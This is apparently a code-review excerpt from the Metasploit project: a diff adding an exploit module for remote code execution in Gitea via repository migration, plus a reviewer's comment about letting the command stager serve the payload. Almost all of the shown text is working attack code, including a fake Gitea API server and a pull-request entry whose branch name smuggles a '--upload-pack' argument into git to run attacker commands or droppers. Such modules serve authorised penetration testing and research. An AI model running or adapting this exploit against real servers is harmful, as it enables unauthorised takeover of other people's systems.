modules/exploits/multi/http/gitea_git_fetch_rce.rb

```diff
@@ -0,0 +1,247 @@
+    vprint_status('Migrating repository')
+    clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"
+    auth_token = rand_text_alphanumeric(6..15)
+    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError => e
+    stageless = datastore['payload'].split('/').last.include?('meterpreter_')
+    if e.message.include?('already used') && stageless
+      gitea_remove_repo(repo_path(@migrate_repo_name))
+      sleep(1)
+      retry
+    else
+      fail_with(Failure::UnexpectedReply, e.message)
+    end
+  end
+
+  def exploit
+    unless datastore['AutoCheck']
+      fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?
+      gitea_login(datastore['username'], datastore['password'])
+    end
+
+    @repo_name = rand_text_alphanumeric(6..15)
+    @migrate_repo_name = rand_text_alphanumeric(6..15)
+    @migrate_repo_path = repo_path(@migrate_repo_name)
+
+    start_service
+    primer
+
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :win_dropper
+      execute_cmdstager(background: true, delay: 1)
+    end
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e
+    fail_with(Failure::NoAccess, e.message)
+  end
+
+  def repo_path(name)
+    "#{datastore['username']}/#{name}"
+  end
+
+  def on_request_uri(cli, req)
+    case req.uri
+    when '/api/v1/version'
+      send_response(cli, '{"version": "1.16.6"}')
+    when '/api/v1/settings/api'
+      data = {
+        max_response_items: 50, default_paging_num: 30,
+        default_git_trees_per_page: 1000, default_max_blob_size: 10485760
+      }
+      send_response(cli, data.to_json)
+    when "/api/v1/repos/#{@migrate_repo_path}"
+      data = {
+        clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",
+        owner: { login: datastore['username'] }
+      }
+      send_response(cli, data.to_json)
+    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"
+      send_response(cli, '{"topics":[]}')
+    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"
+      data = [
+        {
+          base: {
+            ref: 'master'
+          },
+          head: {
+            ref: "--upload-pack=#{@p}",
+            repo: {
+              clone_url: './',
+              owner: { login: 'master' }
+            }
+          },
+          updated_at: '2001-01-01T05:00:00+01:00',
+          user: {}
+        }
+      ]
+      send_response(cli, data.to_json)
+    else # this is lazy, the default is /payloads but we can't control what would user set in CMDSTAGER::URIPATH
+      send_response(cli, exe)
```

Comment:
This is not necessary. Let the `cmdstager` HTTP service deal with sending the payload. Everything else can be ignored:
```suggestion
    when datastore['CMDSTAGER::URIPATH']
      super
    end
```